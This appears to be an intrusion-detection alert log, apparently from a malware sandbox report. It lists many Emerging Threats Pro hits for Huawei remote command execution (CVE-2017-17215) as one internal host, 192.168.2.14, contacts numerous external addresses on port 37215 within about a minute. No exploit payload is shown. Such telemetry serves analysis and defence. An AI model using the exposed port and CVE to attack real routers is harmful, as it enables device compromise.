                                                        06/13/24-21:32:52.656895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516037215192.168.2.14197.7.95.150
                                                        06/13/24-21:32:52.656549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356037215192.168.2.14156.234.25.118
                                                        06/13/24-21:32:46.509629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3719037215192.168.2.14197.21.6.104
                                                        06/13/24-21:32:52.669851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752437215192.168.2.14197.19.237.13
                                                        06/13/24-21:32:07.404201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680037215192.168.2.14156.17.227.21
                                                        06/13/24-21:32:01.222842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5018437215192.168.2.14197.121.144.19
                                                        06/13/24-21:32:32.154115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131837215192.168.2.14156.20.112.151
                                                        06/13/24-21:33:02.907928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5898637215192.168.2.14156.155.174.148
                                                        06/13/24-21:32:40.372304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359237215192.168.2.14156.64.83.45
                                                        06/13/24-21:32:48.550336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736837215192.168.2.14156.179.187.204
                                                        06/13/24-21:32:52.679238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4604037215192.168.2.14197.85.226.188
                                                        06/13/24-21:32:09.457470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5666037215192.168.2.1441.206.150.87
                                                        06/13/24-21:33:00.866112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5657437215192.168.2.14197.187.77.150
                                                        06/13/24-21:32:07.416687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5088037215192.168.2.14197.240.25.240
                                                        06/13/24-21:32:36.266338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5212037215192.168.2.1441.58.52.107
                                                        06/13/24-21:32:07.403885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3382437215192.168.2.14156.28.199.217
                                                        06/13/24-21:32:44.480745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140437215192.168.2.1441.143.239.203
                                                        06/13/24-21:33:00.872608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344637215192.168.2.14156.202.184.182
                                                        06/13/24-21:33:00.885878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909437215192.168.2.14197.165.172.165
                                                        06/13/24-21:32:19.751938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4343437215192.168.2.14156.165.130.187
                                                        06/13/24-21:32:54.711597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3625037215192.168.2.14156.156.55.190
                                                        06/13/24-21:32:07.416018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152437215192.168.2.1441.131.195.83
                                                        06/13/24-21:32:54.725550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4867837215192.168.2.1441.80.92.249
                                                        06/13/24-21:32:54.725944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4119437215192.168.2.14156.76.250.145
                                                        06/13/24-21:32:40.377705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3922637215192.168.2.14197.93.193.239
                                                        06/13/24-21:32:58.839312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734437215192.168.2.14156.228.116.112
                                                        06/13/24-21:32:17.695584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5557637215192.168.2.1441.224.88.132
                                                        06/13/24-21:33:05.016917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5594637215192.168.2.14156.177.133.115
                                                        06/13/24-21:32:03.308159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956037215192.168.2.14197.93.229.54
                                                        06/13/24-21:32:58.839693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3589437215192.168.2.1441.60.23.65
                                                        06/13/24-21:32:36.244795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599437215192.168.2.1441.129.151.102
                                                        06/13/24-21:32:01.218860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267237215192.168.2.1441.26.79.229
                                                        06/13/24-21:32:03.277271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4503437215192.168.2.14197.118.96.81
                                                        06/13/24-21:32:30.097319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3877837215192.168.2.1441.211.106.241
                                                        06/13/24-21:32:17.697536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6048837215192.168.2.1441.198.25.42
                                                        06/13/24-21:32:40.354325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913437215192.168.2.14197.171.201.121
                                                        06/13/24-21:32:13.566239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854637215192.168.2.14156.73.238.39
                                                        06/13/24-21:33:02.936338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5943837215192.168.2.14156.53.218.36
                                                        06/13/24-21:32:28.025779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673437215192.168.2.14197.50.27.11
                                                        06/13/24-21:32:38.298310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5483437215192.168.2.1441.19.78.64
                                                        06/13/24-21:32:09.457590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570037215192.168.2.14156.143.47.14
                                                        06/13/24-21:32:46.509917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947637215192.168.2.1441.143.91.206
                                                        06/13/24-21:32:23.833061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3346237215192.168.2.1441.82.203.184
                                                        06/13/24-21:33:13.229378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476437215192.168.2.1441.24.188.203
                                                        06/13/24-21:31:57.093868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3483437215192.168.2.1441.74.218.69
                                                        06/13/24-21:33:13.210926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3590237215192.168.2.1441.191.226.160
                                                        06/13/24-21:32:03.276043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015837215192.168.2.14197.86.69.163
                                                        06/13/24-21:33:00.889456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3628237215192.168.2.1441.168.190.47
                                                        06/13/24-21:33:00.870407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4759437215192.168.2.1441.202.171.129
                                                        06/13/24-21:32:25.977204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199637215192.168.2.14156.8.206.169
                                                        06/13/24-21:32:30.126647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3773837215192.168.2.1441.130.25.95
                                                        06/13/24-21:32:13.547165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947237215192.168.2.1441.10.193.207
                                                        06/13/24-21:32:50.610515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5755837215192.168.2.1441.50.175.207
                                                        06/13/24-21:33:09.090010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187837215192.168.2.1441.9.118.144
                                                        06/13/24-21:32:05.343482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4731837215192.168.2.14156.64.242.3
                                                        06/13/24-21:32:50.614397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904637215192.168.2.1441.207.188.109
                                                        06/13/24-21:32:15.605818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4877437215192.168.2.1441.178.130.242
                                                        06/13/24-21:32:38.301262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849237215192.168.2.14197.179.18.54
                                                        06/13/24-21:32:58.821508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829037215192.168.2.1441.25.138.22
                                                        06/13/24-21:32:52.677581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443037215192.168.2.1441.20.84.62
                                                        06/13/24-21:32:40.379264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573637215192.168.2.1441.107.166.51
                                                        06/13/24-21:32:17.671908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6052837215192.168.2.1441.74.60.247
                                                        06/13/24-21:32:50.613260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068637215192.168.2.14156.196.114.235
                                                        06/13/24-21:32:40.354958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4094637215192.168.2.1441.124.153.201
                                                        06/13/24-21:32:44.456564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5867037215192.168.2.1441.22.57.93
                                                        06/13/24-21:32:28.043500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961237215192.168.2.1441.81.90.40
                                                        06/13/24-21:32:30.100958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457037215192.168.2.14156.88.156.77
                                                        06/13/24-21:32:44.477042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566437215192.168.2.1441.244.121.158
                                                        06/13/24-21:32:56.785195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4857437215192.168.2.14197.240.211.180
                                                        06/13/24-21:33:00.869622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3938437215192.168.2.14197.84.196.34
                                                        06/13/24-21:33:13.231022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617037215192.168.2.14197.245.28.119
                                                        06/13/24-21:32:52.657343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5637037215192.168.2.1441.152.16.65
                                                        06/13/24-21:32:54.711950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4835837215192.168.2.14156.10.20.51
                                                        06/13/24-21:31:57.132628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4310037215192.168.2.14156.132.238.227
                                                        06/13/24-21:32:09.458108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740037215192.168.2.1441.207.111.131
                                                        06/13/24-21:33:15.258989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5924637215192.168.2.14156.214.52.5
                                                        06/13/24-21:32:03.279463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3539037215192.168.2.14197.21.174.146
                                                        06/13/24-21:32:30.127825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503237215192.168.2.14156.7.246.70
                                                        06/13/24-21:32:32.166290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615437215192.168.2.14156.26.155.227
                                                        06/13/24-21:32:32.167194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834837215192.168.2.14156.181.63.13
                                                        06/13/24-21:32:09.457667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406637215192.168.2.1441.37.45.70
                                                        06/13/24-21:33:00.872695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5567037215192.168.2.1441.8.55.202
                                                        06/13/24-21:31:59.176642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4489437215192.168.2.14156.113.19.65
                                                        06/13/24-21:32:58.838417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3633237215192.168.2.14197.116.231.14
                                                        06/13/24-21:32:07.417464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5293837215192.168.2.1441.185.93.27
                                                        06/13/24-21:33:09.090451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4509237215192.168.2.14197.91.121.214
                                                        06/13/24-21:33:07.039478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450837215192.168.2.14156.210.158.11
                                                        06/13/24-21:32:23.836941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5987237215192.168.2.14197.210.152.131
                                                        06/13/24-21:32:07.400525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504837215192.168.2.14197.140.108.117
                                                        06/13/24-21:33:15.273102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5264037215192.168.2.14197.23.84.100
                                                        06/13/24-21:32:38.315886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481237215192.168.2.14156.209.42.234
                                                        06/13/24-21:33:07.057413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597837215192.168.2.14197.160.247.1
                                                        06/13/24-21:32:17.675577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020637215192.168.2.14156.38.245.177
                                                        06/13/24-21:31:59.195696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5306237215192.168.2.14197.251.142.134
                                                        06/13/24-21:32:03.273664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322237215192.168.2.14197.91.248.132
                                                        06/13/24-21:31:59.177304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4100637215192.168.2.14156.209.60.71
                                                        06/13/24-21:32:34.199622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3636437215192.168.2.14156.136.75.43
                                                        06/13/24-21:32:28.029006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4663437215192.168.2.14156.153.74.102
                                                        06/13/24-21:33:11.177441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5919237215192.168.2.14156.145.84.229
                                                        06/13/24-21:32:09.439708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843437215192.168.2.14197.107.36.180
                                                        06/13/24-21:31:57.090678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4420037215192.168.2.14197.158.27.73
                                                        06/13/24-21:32:52.658382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593237215192.168.2.1441.58.161.111
                                                        06/13/24-21:32:23.943047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462637215192.168.2.1441.135.106.159
                                                        06/13/24-21:33:17.304691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682037215192.168.2.14197.187.167.167
                                                        06/13/24-21:33:07.043108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733637215192.168.2.14197.24.63.31
                                                        06/13/24-21:32:05.370719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440237215192.168.2.1441.141.113.229
                                                        06/13/24-21:32:13.568541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348037215192.168.2.1441.88.151.252
                                                        06/13/24-21:31:57.091503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4778437215192.168.2.14156.253.22.172
                                                        06/13/24-21:32:42.408281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804037215192.168.2.1441.254.182.101
                                                        06/13/24-21:32:17.696253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550237215192.168.2.14156.17.247.218
                                                        06/13/24-21:33:15.274437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937437215192.168.2.1441.154.135.124
                                                        06/13/24-21:32:17.697163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215237215192.168.2.1441.77.203.117
                                                        06/13/24-21:33:07.041735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3646637215192.168.2.14197.133.77.15
                                                        06/13/24-21:33:15.277399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669437215192.168.2.1441.2.157.81
                                                        06/13/24-21:32:52.676198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540637215192.168.2.14197.83.78.40
                                                        06/13/24-21:33:13.213740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790237215192.168.2.14156.69.109.248
                                                        06/13/24-21:32:09.440884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3438637215192.168.2.1441.213.235.87
                                                        06/13/24-21:33:00.868361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433037215192.168.2.14197.235.15.148
                                                        06/13/24-21:33:09.106167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3719237215192.168.2.14156.28.104.162
                                                        06/13/24-21:32:48.570892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805837215192.168.2.14197.208.246.116
                                                        06/13/24-21:33:02.909490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5837237215192.168.2.1441.196.162.235
                                                        06/13/24-21:33:07.060506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157037215192.168.2.14156.244.150.109
                                                        06/13/24-21:33:07.038293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3931837215192.168.2.14197.156.109.239
                                                        06/13/24-21:33:15.251564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660037215192.168.2.14156.219.234.135
                                                        06/13/24-21:32:28.025624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941637215192.168.2.14156.168.46.249
                                                        06/13/24-21:32:50.632907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5914637215192.168.2.14197.89.93.235
                                                        06/13/24-21:32:48.551851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960837215192.168.2.14197.34.62.25
                                                        06/13/24-21:32:52.660671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797437215192.168.2.14197.89.45.248
                                                        06/13/24-21:33:02.913796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877437215192.168.2.14156.69.119.157
                                                        06/13/24-21:32:54.710986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022637215192.168.2.1441.42.76.200
                                                        06/13/24-21:32:38.303649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3554037215192.168.2.14156.11.233.202
                                                        06/13/24-21:32:32.171418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3743037215192.168.2.1441.242.174.16
                                                        06/13/24-21:32:48.555858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886037215192.168.2.14197.156.15.253
                                                        06/13/24-21:32:03.308103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316437215192.168.2.1441.245.102.93
                                                        06/13/24-21:32:21.783048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788437215192.168.2.14156.216.164.224
                                                        06/13/24-21:33:02.909420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441037215192.168.2.1441.153.149.230
                                                        06/13/24-21:32:15.638175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384637215192.168.2.14156.81.183.120
                                                        06/13/24-21:33:11.180526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969637215192.168.2.14197.241.25.118
                                                        06/13/24-21:32:11.509393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5723437215192.168.2.14197.143.121.101
                                                        06/13/24-21:31:59.200284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570637215192.168.2.14156.167.30.215
                                                        06/13/24-21:33:07.039734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3707837215192.168.2.14156.237.239.23
                                                        06/13/24-21:31:59.195259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974237215192.168.2.1441.32.17.23
                                                        06/13/24-21:32:11.487889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3906437215192.168.2.14156.91.60.196
                                                        06/13/24-21:32:28.048507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892037215192.168.2.14156.253.177.253
                                                        06/13/24-21:32:21.787564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731237215192.168.2.14197.209.28.183
                                                        06/13/24-21:33:15.276526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3948237215192.168.2.1441.154.69.68
                                                        06/13/24-21:32:28.043531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695037215192.168.2.14156.77.216.74
                                                        06/13/24-21:32:05.346569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199037215192.168.2.14156.33.139.199
                                                        06/13/24-21:32:32.170307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5712237215192.168.2.14156.36.252.162
                                                        06/13/24-21:32:28.028666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707437215192.168.2.14197.226.183.112
                                                        06/13/24-21:32:25.972994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497237215192.168.2.14197.24.170.121
                                                        06/13/24-21:32:36.247243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754637215192.168.2.14197.210.24.196
                                                        06/13/24-21:32:40.375780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669637215192.168.2.1441.69.104.35
                                                        06/13/24-21:32:19.753569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660037215192.168.2.14197.29.50.143
                                                        06/13/24-21:32:48.567810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872237215192.168.2.1441.166.223.20
                                                        06/13/24-21:33:11.173948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5242637215192.168.2.14156.85.88.77
                                                        06/13/24-21:32:21.804612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472637215192.168.2.14197.176.179.225
                                                        06/13/24-21:33:07.058368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922037215192.168.2.14156.209.81.99
                                                        06/13/24-21:32:34.191532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4179637215192.168.2.1441.220.96.119
                                                        06/13/24-21:32:44.480605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5645437215192.168.2.1441.134.238.30
                                                        06/13/24-21:32:48.555901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5592237215192.168.2.14197.196.186.154
                                                        06/13/24-21:33:02.914159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3921237215192.168.2.14197.61.190.141
                                                        06/13/24-21:32:30.128236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4235837215192.168.2.14197.177.184.182
                                                        06/13/24-21:32:34.213192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613437215192.168.2.14197.176.151.194
                                                        06/13/24-21:33:00.871786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174037215192.168.2.1441.227.104.11
                                                        06/13/24-21:33:09.089574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930237215192.168.2.14197.61.120.47
                                                        06/13/24-21:33:15.259270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529637215192.168.2.14197.245.193.85
                                                        06/13/24-21:32:03.277881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891637215192.168.2.14156.40.255.202
                                                        06/13/24-21:32:40.353541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744437215192.168.2.1441.96.118.189
                                                        06/13/24-21:32:05.350425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5482637215192.168.2.14156.106.248.200
                                                        06/13/24-21:32:11.509482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3442237215192.168.2.14156.189.72.131
                                                        06/13/24-21:32:30.098873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863037215192.168.2.14197.11.243.82
                                                        06/13/24-21:32:07.420184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5260837215192.168.2.1441.25.51.249
                                                        06/13/24-21:32:17.674912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352237215192.168.2.1441.127.111.145
                                                        06/13/24-21:32:38.316191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5232237215192.168.2.14156.138.190.243
                                                        06/13/24-21:33:11.159014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331837215192.168.2.14197.188.246.35
                                                        06/13/24-21:32:40.377746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5318237215192.168.2.14156.16.53.124
                                                        06/13/24-21:32:13.565173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521637215192.168.2.14197.213.77.184
                                                        06/13/24-21:32:23.833687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833237215192.168.2.1441.70.112.147
                                                        06/13/24-21:32:38.320670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751637215192.168.2.14156.124.73.42
                                                        06/13/24-21:32:11.506641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5692237215192.168.2.14197.16.242.233
                                                        06/13/24-21:32:44.480118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080437215192.168.2.14156.178.189.154
                                                        06/13/24-21:32:28.024390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5904837215192.168.2.14197.175.35.212
                                                        06/13/24-21:32:42.407594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5785637215192.168.2.14156.107.225.158
                                                        06/13/24-21:32:54.706931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5641837215192.168.2.14156.119.235.7
                                                        06/13/24-21:32:13.565118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832237215192.168.2.14156.152.161.212
